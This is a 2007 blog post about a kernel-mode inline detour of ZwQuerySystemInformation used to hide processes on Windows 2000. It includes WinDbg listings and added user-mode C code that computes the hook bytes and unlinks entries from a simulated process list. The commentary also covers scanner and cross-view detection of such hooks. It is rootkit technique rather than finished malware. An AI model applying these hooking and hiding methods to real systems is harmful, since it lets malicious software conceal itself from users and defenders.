Ring0 Detour Demo

Published on 2007-06-05

First time writing a driver, first time using WinDbg + VMware, first time doing a detour in ring0.
Amazingly, although debugging turned up plenty of errors, there was not a single BSOD..
Noting it down: hooked ZwQuerySystemInformation to do process hiding.
Test environment: Windows 2000 Server SP4:

Before the hook:

kd> u nt!ZwQuerySystemInformation
nt!ZwQuerySystemInformation:
804011aa b897000000      mov     eax,97h
804011af 8d542404        lea     edx,[esp+4]
804011b3 cd2e            int     2Eh
804011b5 c21000          ret     10h
804011b8 8bff            mov     edi,edi

After the hook:

kd> u hookproc!Jmp_ZwQuerySystemInformation
hookproc!Jmp_ZwQuerySystemInformation [e:\tmp\rk\hide_proc\hide_proc.c @ 141]:
f41504d0 b897000000      mov     eax,97h
f41504d5 eaaf1140800800  jmp     0008:804011AF
f41504dc 90              nop
f41504dd 90              nop
f41504de cc              int     3
f41504df cc              int     3
f41504e0 cc              int     3
f41504e1 cc              int     3
kd> u nt!ZwQuerySystemInformation
nt!ZwQuerySystemInformation:
804011aa e941f3d473      jmp     hookproc!Fake_ZwQuerySystemInformation (f41504f0)
804011af 8d542404        lea     edx,[esp+4]
804011b3 cd2e            int     2Eh
804011b5 c21000          ret     10h
804011b8 8bff            mov     edi,edi
nt!ZwQuerySystemTime:
804011ba b898000000      mov     eax,98h
804011bf 8d542404        lea     edx,[esp+4]
804011c3 cd2e            int     2Eh
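What the two listings show is a classic 5-byte inline detour: the first instruction of nt!ZwQuerySystemInformation (`mov eax,97h`, exactly 5 bytes) is overwritten with `jmp Fake_ZwQuerySystemInformation`, and the displaced instruction is parked in Jmp_ZwQuerySystemInformation followed by a far `jmp 0008:804011AF` that resumes the original at its second instruction, so the fake can call the trampoline to get the real result. The example below is added here and is not the driver's code; it only does the byte arithmetic, in user mode, using the addresses taken from the listing (the kernel code selector 0008 and the 32-bit address width are read off the listing too), and checks that it reproduces the bytes WinDbg printed. It also includes the inverse, resolving an E9 jump to its target, which is the check a scanner runs over exported Zw and Nt routines to find a detour whose destination lies outside ntoskrnl. Two caveats a practitioner would want: the displaced bytes must end on an instruction boundary (here they do only because the stub starts with a 5-byte `mov eax,imm32`), and nt!ZwQuerySystemInformation is the stub used by kernel-mode callers; a user-mode call goes through ntdll's own `int 2Eh` straight to the SSDT entry for NtQuerySystemInformation and never passes this address, so hiding from a user-mode process list needs the hook on that path instead.

```c
/* Added example, not the original driver: encode and verify the two patches of
 * a 5-byte x86 inline detour using the addresses from the WinDbg listing. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define JMP_REL32_LEN 5          /* E9 rel32 */
#define JMP_FAR_LEN   7          /* EA off32 sel16 */
#define KERNEL_CS     0x0008     /* selector shown in the listing (jmp 0008:...) */

/* Addresses and bytes copied from the listing above. */
static const uint32_t kZwQuerySystemInformation = 0x804011AAu;
static const uint32_t kFakeHook                 = 0xF41504F0u;
static const uint8_t  kOriginalPrologue[5] = { 0xB8, 0x97, 0x00, 0x00, 0x00 }; /* mov eax,97h */
static const uint8_t  kPatchedPrologue[5]  = { 0xE9, 0x41, 0xF3, 0xD4, 0x73 }; /* jmp f41504f0 */

/* Encode a near "jmp rel32" placed at src that lands on dst.
 * rel32 is relative to the end of the 5-byte instruction. */
static void encode_jmp_rel32(uint32_t src, uint32_t dst, uint8_t out[JMP_REL32_LEN])
{
    uint32_t rel = dst - (src + JMP_REL32_LEN);  /* unsigned wrap is the intended mod 2^32 */
    out[0] = 0xE9;
    out[1] = (uint8_t)rel;
    out[2] = (uint8_t)(rel >> 8);
    out[3] = (uint8_t)(rel >> 16);
    out[4] = (uint8_t)(rel >> 24);
}

/* Inverse: if the code at src starts with E9, return where the jump lands,
 * otherwise 0. A scanner walking exported Zw and Nt routines uses exactly
 * this to spot a detour whose target is outside the kernel image. */
static uint32_t decode_jmp_rel32(uint32_t src, const uint8_t *code)
{
    uint32_t rel;
    if (code[0] != 0xE9)
        return 0;
    rel = (uint32_t)code[1] | ((uint32_t)code[2] << 8) |
          ((uint32_t)code[3] << 16) | ((uint32_t)code[4] << 24);
    return src + JMP_REL32_LEN + rel;
}

/* Build the trampoline (Jmp_ZwQuerySystemInformation in the listing): the
 * displaced prologue bytes, then a far jmp sel:off32 back to original+len.
 * prologue_len must cover the 5 overwritten bytes and end on an instruction
 * boundary. Returns bytes written, or 0 on bad arguments. */
static size_t build_trampoline(const uint8_t *prologue, size_t prologue_len,
                               uint32_t original, uint8_t *out, size_t out_len)
{
    uint32_t resume = original + (uint32_t)prologue_len;
    uint8_t *p;
    if (prologue_len < JMP_REL32_LEN || out_len < prologue_len + JMP_FAR_LEN)
        return 0;
    memcpy(out, prologue, prologue_len);
    p = out + prologue_len;
    p[0] = 0xEA;
    p[1] = (uint8_t)resume;
    p[2] = (uint8_t)(resume >> 8);
    p[3] = (uint8_t)(resume >> 16);
    p[4] = (uint8_t)(resume >> 24);
    p[5] = (uint8_t)KERNEL_CS;
    p[6] = (uint8_t)(KERNEL_CS >> 8);
    return prologue_len + JMP_FAR_LEN;
}

/* Returns 1 when the computed bytes reproduce the listing exactly. */
static int matches_listing(void)
{
    static const uint8_t expect_tramp[12] = { 0xB8, 0x97, 0x00, 0x00, 0x00,
                                              0xEA, 0xAF, 0x11, 0x40, 0x80, 0x08, 0x00 };
    uint8_t patch[JMP_REL32_LEN], tramp[16];
    size_t n;
    encode_jmp_rel32(kZwQuerySystemInformation, kFakeHook, patch);
    n = build_trampoline(kOriginalPrologue, sizeof kOriginalPrologue,
                         kZwQuerySystemInformation, tramp, sizeof tramp);
    return n == sizeof expect_tramp &&
           memcmp(patch, kPatchedPrologue, sizeof patch) == 0 &&
           memcmp(tramp, expect_tramp, n) == 0;
}

int main(void)
{
    uint8_t patch[JMP_REL32_LEN];
    size_t i;
    encode_jmp_rel32(kZwQuerySystemInformation, kFakeHook, patch);
    printf("patch at %08x:", kZwQuerySystemInformation);
    for (i = 0; i < sizeof patch; i++)
        printf(" %02x", patch[i]);
    printf("\nresolves to %08x, listing match: %d\n",
           decode_jmp_rel32(kZwQuerySystemInformation, patch), matches_listing());
    return 0;
}
```

Writing the patch into the live kernel image is a separate step the example leaves out: on x86 the page is write-protected, so the driver must clear CR0.WP or map the bytes through a writable MDL before the 5 bytes go in, and the write should be done so that another CPU cannot execute a half-written instruction.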
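The post does not show Fake_ZwQuerySystemInformation, only that the hook is used for process hiding. The usual way such a hook does that, and what this added example assumes (it is not the driver's code), is to call the trampoline to get the real SystemProcessInformation buffer and then unlink the entries to hide by folding each one's NextEntryOffset into its predecessor's, leaving the buffer in place so that pointers into it stay valid. The structure below is a stand-in that keeps only NextEntryOffset (the first field, as in the real SYSTEM_PROCESS_INFORMATION) and a process id, the sample pids and names are constructed, and the entries are laid out with padding so the walker has to trust NextEntryOffset rather than a fixed stride. It handles the two edge cases: hiding the last entry, which must make its predecessor the terminator, and the first entry, which has no predecessor and is left alone. The same walk, run against a second source of truth such as a pid brute-force or an EPROCESS list walk, is how a cross-view check finds a list that has been filtered this way.

```c
/* Added example, not the original driver: unlink entries from a
 * SystemProcessInformation-style buffer by rewriting NextEntryOffset. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Stand-in for SYSTEM_PROCESS_INFORMATION; the real structure has many more
 * fields. NextEntryOffset is first, as in the real one. */
typedef struct {
    uint32_t NextEntryOffset;   /* bytes from this entry to the next, 0 on the last */
    uint32_t UniqueProcessId;
    char     ImageName[16];     /* stand-in for the UNICODE_STRING in the real struct */
} PROC_ENTRY;

#define SAMPLE_COUNT 4
#define SAMPLE_PAD   8          /* extra bytes after each entry: non-uniform stride */
static union {
    PROC_ENTRY align;           /* forces alignment suitable for the cast below */
    uint8_t    bytes[SAMPLE_COUNT * (sizeof(PROC_ENTRY) + SAMPLE_PAD)];
} g_sample;

/* Lay out four constructed entries; pids and names are made-up sample data. */
static uint8_t *build_sample(void)
{
    static const uint32_t pids[SAMPLE_COUNT]  = { 0, 4, 1234, 1500 };
    static const char    *names[SAMPLE_COUNT] = { "Idle", "System", "hidden.exe", "cmd.exe" };
    const uint32_t stride = (uint32_t)sizeof(PROC_ENTRY) + SAMPLE_PAD;
    uint8_t *p = g_sample.bytes;
    size_t i;
    memset(g_sample.bytes, 0, sizeof g_sample.bytes);
    for (i = 0; i < SAMPLE_COUNT; i++) {
        PROC_ENTRY *e = (PROC_ENTRY *)p;
        e->UniqueProcessId = pids[i];
        strncpy(e->ImageName, names[i], sizeof e->ImageName - 1);
        e->NextEntryOffset = (i + 1 < SAMPLE_COUNT) ? stride : 0;
        p += stride;
    }
    return g_sample.bytes;
}

/* Unlink every entry whose pid == hide by folding its offset into the
 * predecessor's. Returns the number removed. The last entry is handled by
 * making its predecessor the terminator; the first entry has no predecessor
 * and is left in place (in real output it is the idle process, pid 0). */
static int hide_pid(uint8_t *buf, uint32_t hide)
{
    PROC_ENTRY *prev = NULL, *cur = (PROC_ENTRY *)buf;
    int removed = 0;
    for (;;) {
        PROC_ENTRY *next = cur->NextEntryOffset
                         ? (PROC_ENTRY *)((uint8_t *)cur + cur->NextEntryOffset) : NULL;
        if (cur->UniqueProcessId == hide && prev != NULL) {
            prev->NextEntryOffset = next ? prev->NextEntryOffset + cur->NextEntryOffset : 0;
            removed++;              /* prev unchanged: cur is no longer reachable */
        } else {
            prev = cur;
        }
        if (next == NULL)
            break;
        cur = next;
    }
    return removed;
}

/* Walk the chain the way a consumer of the buffer would. */
static int count_visible(const uint8_t *buf)
{
    const PROC_ENTRY *e = (const PROC_ENTRY *)buf;
    int n = 1;
    while (e->NextEntryOffset) {
        e = (const PROC_ENTRY *)((const uint8_t *)e + e->NextEntryOffset);
        n++;
    }
    return n;
}

static int pid_visible(const uint8_t *buf, uint32_t pid)
{
    const PROC_ENTRY *e = (const PROC_ENTRY *)buf;
    for (;;) {
        if (e->UniqueProcessId == pid)
            return 1;
        if (!e->NextEntryOffset)
            return 0;
        e = (const PROC_ENTRY *)((const uint8_t *)e + e->NextEntryOffset);
    }
}

/* Build a fresh sample, apply the filter, report the consumer's view. */
static int count_after_hiding(uint32_t hide)
{
    uint8_t *b = build_sample();
    hide_pid(b, hide);
    return count_visible(b);
}

static int visible_after_hiding(uint32_t hide, uint32_t query)
{
    uint8_t *b = build_sample();
    hide_pid(b, hide);
    return pid_visible(b, query);
}

int main(void)
{
    uint8_t *b = build_sample();
    printf("before: %d entries, pid 1234 visible=%d\n", count_visible(b), pid_visible(b, 1234));
    printf("removed %d\n", hide_pid(b, 1234));
    printf("after : %d entries, pid 1234 visible=%d, pid 1500 visible=%d\n",
           count_visible(b), pid_visible(b, 1234), pid_visible(b, 1500));
    return 0;
}
```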
